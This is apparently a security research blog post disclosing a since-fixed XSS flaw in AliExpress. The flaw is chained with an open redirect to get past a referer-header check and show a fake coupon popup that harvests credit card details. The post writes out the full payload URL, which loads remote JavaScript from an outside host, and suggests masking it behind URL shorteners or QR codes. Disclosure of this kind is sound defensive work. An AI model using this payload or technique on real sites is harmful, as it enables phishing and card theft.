Research By: Dikla Barda, Roman Zaikin and Oded Vanunu

Black Friday symbolizes the start of the end of year shopping season. During this period, online shopping is expected to increase rapidly as consumers search for online bargains, visit product comparison sites and generally avoid the hassle of crowded shopping malls.

Researchers at Check Point recently discovered that criminals have a new way to trick merry online shoppers via the massively popular AliExpress shopping portal. With more than 100 million customers and $23bn in revenue worldwide, AliExpress, part of the AliBaba Group, is one of the most popular places to shop online.

After discovering the vulnerability, Check Point Researchers immediately informed AliExpress (9th Oct) who, due to taking cybersecurity very seriously, took swift action and fixed it within two days of notification (Oct 11th). This is highly commendable and sets an example to other online retailers.

The new vulnerability allows criminals to target AliExpress users by sending them a link to an AliExpress web page containing malicious Javascript code. Upon opening the page, the code is executed in the user’s web browser and so bypasses AliExpress’s protection against cross-site scripting attack by using open redirect vulnerability on AliExpress web site.

Research Overview

AliExpress using Coupons to attract new and returning customers to shop on its site. Once customers arrive at the site’s home page, AliExpress often shows them a pop-up overlay and asks them to input their credit card details in order to ensure a more efficient shopping experience. This makes for easy online payment and faster checkouts.

Example of Coupon Pop-Up Overlay:

If an attacker were to find a way to inject code to AliExpress this could abuse the AliExpress logic and create a payload that would look something like this:

Example of Attacker’s Fake Coupon Overlay:

The attack starts by luring the victim into clicking on a malicious link, sent by email for example. The customer would then be taken to the alixpress.com login page. After login, the victim could then be redirected to a page with the injected code implanted in it. A coupon window could then be displayed requesting them to save their credit card details and claim $50.

These credit card details would then be sent directly to the attack server.

Demo of the Attack:

Vulnerability Discovery

AliExpress contains a lot of websites and sub-domains under the Alibaba Group. We managed to find that ‘us.cobra.aliexpress.com’ reflects the parameter ‘cb’.

Figure 1 With Referer Header

By manipulating the parameter, we managed to execute our JavaScript code from AliExpress’s sub domain. We found that sending our payload directly to the victim would not work, since AliExpress has protection against cross site scripting attacks. As you can see from the image below, the payload would not run.

Figure 2 Without Referer Header

AliExpress uses only a simple method to thwart these kind of attacks though. The method involved checking the referer header of the request and if the referer was not set or was incorrect then the request would be denied by the server.

How ‘referer’ Works?

The referer is an HTTP header that identifies the URL of the webpage where the request was requested from. For example, if we will go to blog.checkpoint.com, the referer header will not be set because this is the first time we have opened the web page.

GET /2017/03/15/check-point-discloses-vulnerability-whatsapp-telegram/ HTTP/1.1Host: blog.checkpoint.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0

Having done that though, if you click on a link to YouTube, the browser will add the referer header that will tell YouTube that we have come from blog.checkpoint.com.

GET /UR_i5XSAKrg HTTP/1.1Host: youtu.beUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0Referer: https://blog.checkpoint.com/2017/03/15/check-point-discloses-vulnerability-whatsapp-telegram/

An important point to note though is that the referer is set on every resource requested like JavaScript, CSS, images and so forth.

So, if an attacker would send a malicious link on its own to the victim then it will not work! In order to bypass this referer protection then, we needed to use a simple trick.

The Trick

We had a malicious link that needed to be sent from AliExpress to the victim and not directly by us due to the referer header protection mentioned above. In order to achieve that we looked for links in AliExpress that redirected to a second link in AliExpress, a link that we could replace with our own malicious link.

We found the following redirect link, which ended up with the following payload:

https://login.aliexpress.com/havana_login_check.htm?site=4&loginurl=https://us.cobra.aliexpress.com/p4pforlist.html?pid=801_0000_0107%26cb=3D%253Cscript%253Ealert%25281%2529%253C%252Fscript%253E&params
=https://us.cobra.aliexpress.com/p4pforlist.html?pid=801_0000_0107%26cb=%253Cscript%2Btype%253D%2527text%252Fjavascript%2527%2Bsrc%253D
%2522https%253A%252F%252Fgmailtracker.com%252Fpoc.js%2522%253E%253C%252Fscript%253E

The next step was to create a shorter link for this payload to mask it. To do that we could have used any URL shortener link. For example:

or even a malicious QR code:

If the victim were to click on one of the links or scan the QR code he would be redirected to the AliExpress login screen that would inject our malicious JavaScript to the page and issue the following fake popup:

Any data that would be inserted to this popup would be sent to the attacker.